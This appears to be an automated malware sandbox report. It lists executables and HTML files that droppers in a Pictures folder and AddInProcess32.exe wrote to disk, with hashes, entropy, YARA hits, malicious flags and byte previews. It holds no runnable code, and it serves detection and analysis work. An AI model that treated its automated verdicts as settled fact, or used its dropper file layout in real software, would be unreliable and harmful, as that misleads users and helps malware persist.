                                                                                                                                                                                                                                SSDEEP:3072:0U7+A0a8Ga/QpvLEnbA+QQAZXZzMbqQR4bZBKxh0SnWo6mzQ6dp8Kbz65X0Cn8Kq:CQa/Q5Hv5Aj0A6mzQuGUzr5KqbI
                                                                                                                                                                                                                                MD5:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                SHA1:6CD341FEA9D92DC88722A3BA01EC820159A32356
                                                                                                                                                                                                                                SHA-256:94B32F3EEB16CE61BBBE25514219B34C1A9427AD1CF18CB1FCED2891323C0287
                                                                                                                                                                                                                                SHA-512:1921C30937D1D88A6AF70773995E03BE43FA2FC23BEE0C2A583BA437662602218AB1CC63D0CBB8DE41C2D0E1DD874A069A2A9AD509AB065335CD33B309C07DF9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L.....Md............................O?............@..........................0......OJ..........................................P....p..................................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc........p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u46g.1.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4866096
                                                                                                                                                                                                                                Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u46g.1.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u4dc.0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):325120
                                                                                                                                                                                                                                Entropy (8bit):6.523543971601626
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:0U7+A0a8Ga/QpvLEnbA+QQAZXZzMbqQR4bZBKxh0SnWo6mzQ6dp8Kbz65X0Cn8Kq:CQa/Q5Hv5Aj0A6mzQuGUzr5KqbI
                                                                                                                                                                                                                                MD5:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                SHA1:6CD341FEA9D92DC88722A3BA01EC820159A32356
                                                                                                                                                                                                                                SHA-256:94B32F3EEB16CE61BBBE25514219B34C1A9427AD1CF18CB1FCED2891323C0287
                                                                                                                                                                                                                                SHA-512:1921C30937D1D88A6AF70773995E03BE43FA2FC23BEE0C2A583BA437662602218AB1CC63D0CBB8DE41C2D0E1DD874A069A2A9AD509AB065335CD33B309C07DF9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L.....Md............................O?............@..........................0......OJ..........................................P....p..................................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc........p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u4dc.1.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4866096
                                                                                                                                                                                                                                Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u4dc.1.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u4hg.0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):325120
                                                                                                                                                                                                                                Entropy (8bit):6.523543971601626
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:0U7+A0a8Ga/QpvLEnbA+QQAZXZzMbqQR4bZBKxh0SnWo6mzQ6dp8Kbz65X0Cn8Kq:CQa/Q5Hv5Aj0A6mzQuGUzr5KqbI
                                                                                                                                                                                                                                MD5:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                SHA1:6CD341FEA9D92DC88722A3BA01EC820159A32356
                                                                                                                                                                                                                                SHA-256:94B32F3EEB16CE61BBBE25514219B34C1A9427AD1CF18CB1FCED2891323C0287
                                                                                                                                                                                                                                SHA-512:1921C30937D1D88A6AF70773995E03BE43FA2FC23BEE0C2A583BA437662602218AB1CC63D0CBB8DE41C2D0E1DD874A069A2A9AD509AB065335CD33B309C07DF9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L.....Md............................O?............@..........................0......OJ..........................................P....p..................................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc........p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u4hg.1.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4866096
                                                                                                                                                                                                                                Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u4hg.1.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u5v8.0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):325120
                                                                                                                                                                                                                                Entropy (8bit):6.523543971601626
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:0U7+A0a8Ga/QpvLEnbA+QQAZXZzMbqQR4bZBKxh0SnWo6mzQ6dp8Kbz65X0Cn8Kq:CQa/Q5Hv5Aj0A6mzQuGUzr5KqbI
                                                                                                                                                                                                                                MD5:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                SHA1:6CD341FEA9D92DC88722A3BA01EC820159A32356
                                                                                                                                                                                                                                SHA-256:94B32F3EEB16CE61BBBE25514219B34C1A9427AD1CF18CB1FCED2891323C0287
                                                                                                                                                                                                                                SHA-512:1921C30937D1D88A6AF70773995E03BE43FA2FC23BEE0C2A583BA437662602218AB1CC63D0CBB8DE41C2D0E1DD874A069A2A9AD509AB065335CD33B309C07DF9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L.....Md............................O?............@..........................0......OJ..........................................P....p..................................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc........p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u5v8.1.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4866096
                                                                                                                                                                                                                                Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5v8.1.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u624.0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):325120
                                                                                                                                                                                                                                Entropy (8bit):6.523543971601626
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:0U7+A0a8Ga/QpvLEnbA+QQAZXZzMbqQR4bZBKxh0SnWo6mzQ6dp8Kbz65X0Cn8Kq:CQa/Q5Hv5Aj0A6mzQuGUzr5KqbI
                                                                                                                                                                                                                                MD5:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                SHA1:6CD341FEA9D92DC88722A3BA01EC820159A32356
                                                                                                                                                                                                                                SHA-256:94B32F3EEB16CE61BBBE25514219B34C1A9427AD1CF18CB1FCED2891323C0287
                                                                                                                                                                                                                                SHA-512:1921C30937D1D88A6AF70773995E03BE43FA2FC23BEE0C2A583BA437662602218AB1CC63D0CBB8DE41C2D0E1DD874A069A2A9AD509AB065335CD33B309C07DF9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L.....Md............................O?............@..........................0......OJ..........................................P....p..................................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc........p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u624.1.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4866096
                                                                                                                                                                                                                                Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u624.1.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u69w.0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):325120
                                                                                                                                                                                                                                Entropy (8bit):6.523543971601626
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:0U7+A0a8Ga/QpvLEnbA+QQAZXZzMbqQR4bZBKxh0SnWo6mzQ6dp8Kbz65X0Cn8Kq:CQa/Q5Hv5Aj0A6mzQuGUzr5KqbI
                                                                                                                                                                                                                                MD5:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                SHA1:6CD341FEA9D92DC88722A3BA01EC820159A32356
                                                                                                                                                                                                                                SHA-256:94B32F3EEB16CE61BBBE25514219B34C1A9427AD1CF18CB1FCED2891323C0287
                                                                                                                                                                                                                                SHA-512:1921C30937D1D88A6AF70773995E03BE43FA2FC23BEE0C2A583BA437662602218AB1CC63D0CBB8DE41C2D0E1DD874A069A2A9AD509AB065335CD33B309C07DF9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L.....Md............................O?............@..........................0......OJ..........................................P....p..................................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc........p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u69w.1.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4866096
                                                                                                                                                                                                                                Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u69w.1.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\UCtmeOC2UHPIofYPbbfGVnal.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\UK8ipx6lqPw4aE70mcGL0JtJ.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\V4R2L1ofXzAhB4UFI0Rj2LED.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4407808
                                                                                                                                                                                                                                Entropy (8bit):7.9915034437777726
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
                                                                                                                                                                                                                                MD5:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
                                                                                                                                                                                                                                SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
                                                                                                                                                                                                                                SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VKzps0C0te7NTLkv4QCHU1YW.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
